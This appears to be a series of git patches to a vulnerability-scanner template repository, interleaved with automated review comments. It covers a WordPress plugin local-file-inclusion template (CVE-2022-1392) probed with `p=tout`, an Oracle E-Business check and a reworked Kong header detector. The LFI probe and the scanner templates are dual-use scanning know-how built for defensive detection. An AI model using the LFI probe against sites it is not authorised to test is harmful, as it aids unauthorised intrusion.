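Review bot: The rewritten matcher in cves/2022/CVE-2022-1392.yaml depends on PHP printing the include warning (`failed to open stream: No such file or directory`) into the response, so a vulnerable site with error display turned off returns nothing to match and is reported clean. Requesting `p=tout` is less invasive than reading a system file, which is a reasonable trade, but the limitation should be stated in `description` so a negative result is not read as proof that the plugin is patched. It is also worth confirming that the fixed plugin version does not emit the same warning for `p=tout`, since the hunk does not show what separates a patched response from a vulnerable one.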
@@ -2,6 +2,7 @@ cnvd/2020/CNVD-2020-46552.yaml cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml +cves/2022/CVE-2022-1392.yaml cves/2022/CVE-2022-30489.yaml misconfiguration/oracle-ebusiness-registration-enabled.yaml misconfiguration/unauth-wavink-panel.yaml From 0a49492f2aaf5ca35d044fef5214f8cd1ad7a8b5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 May 2022 17:43:06 +0530 Subject: [PATCH 61/68] Update CVE-2022-1392.yaml --- cves/2022/CVE-2022-1392.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2022/CVE-2022-1392.yaml b/cves/2022/CVE-2022-1392.yaml index a8839ae60d..2b11be3bae 100644 --- a/cves/2022/CVE-2022-1392.yaml +++ b/cves/2022/CVE-2022-1392.yaml @@ -13,6 +13,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1392 + metadata: + verified: true tags: lfi,wp-plugin,cve,cve2022,wp,wordpress,unauth requests: From 3f9ce9fb4409f66f559826896c5d0d8ee14bdbde Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 May 2022 18:50:40 +0530 Subject: [PATCH 63/68] Update oracle-ebusiness-registration-enabled.yaml --- misconfiguration/oracle-ebusiness-registration-enabled.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/oracle-ebusiness-registration-enabled.yaml b/misconfiguration/oracle-ebusiness-registration-enabled.yaml index e3726f8915..9b39464f64 100644 --- a/misconfiguration/oracle-ebusiness-registration-enabled.yaml +++ b/misconfiguration/oracle-ebusiness-registration-enabled.yaml @@ -2,7 +2,7 @@ id: oracle-ebusiness-registration-enabled info: name: Oracle E-Business Login Panel Registration Accessible - author: tess + author: 3th1c_yuk1,tess severity: info description: Oracle E-Business Login Panel Registration Accessible. reference: From 504d6343cc6739fee2d11044f42b4550d5262f57 Mon Sep 17 00:00:00 2001 
From: Josh Larsen <2565382+joshlarsen@users.noreply.github.com> Date: Mon, 16 May 2022 12:06:55 -0400 Subject: [PATCH 65/68] Detect more Kong headers (#4406) * Detect more Kong headers * simplified template with case-insensitive word matchers Co-authored-by: sandeep --- technologies/kong-detect.yaml | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml index dc99ead28d..9b301b7ce8 100644 --- a/technologies/kong-detect.yaml +++ b/technologies/kong-detect.yaml @@ -2,7 +2,7 @@ id: kong-detect info: name: Detect Kong - author: geeknik + author: geeknik,joshlarsen severity: info description: The Cloud-Native API Gateway reference: @@ -14,16 +14,18 @@ requests: path: - "{{BaseURL}}" - matchers-condition: and matchers: - - - type: regex + - type: word part: header - regex: - - "[Ss]erver: [Kk]ong+" + words: + - "server: kong" + - "x-kong-response-latency" + - "x-kong-upstream_latency" + - "x-kong-proxy-latency" + condition: or + case-insensitive: true extractors: - type: kval - part: header kval: - - server + - server \ No newline at end of file From 4fbdb224a060f168881edf842bc12483a6acae21 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 16 May 2022 23:35:31 +0530 Subject: [PATCH 67/68] Typo update --- technologies/kong-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml index 9b301b7ce8..6e9833bfee 100644 --- a/technologies/kong-detect.yaml +++ b/technologies/kong-detect.yaml @@ -20,7 +20,7 @@ requests: words: - "server: kong" - "x-kong-response-latency" - - "x-kong-upstream_latency" + - "x-kong-upstream-latency" - "x-kong-proxy-latency" condition: or case-insensitive: true @@ -28,4 +28,4 @@ requests: extractors: - type: kval kval: - - server \ No newline at end of file + - server
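Review bot: With `condition: or` in the second hunk of the kong-detect change, the template can now match on an `x-kong-*` latency header alone, yet the extractor still reports only `server`. Behind a fronting proxy the extracted value may therefore name a different server or be empty, which can mislead whoever triages the finding. Consider a comment next to the extractor such as `# server may not be Kong when the match came from an x-kong-* header`, or also extract one of the Kong headers (nuclei kval names use underscores, e.g. `x_kong_proxy_latency`). Separately, `server: kong` is a substring match over the whole header block, so it would also hit a header whose name merely ends in `server`; that trade-off of the word matcher deserves a short note in the template.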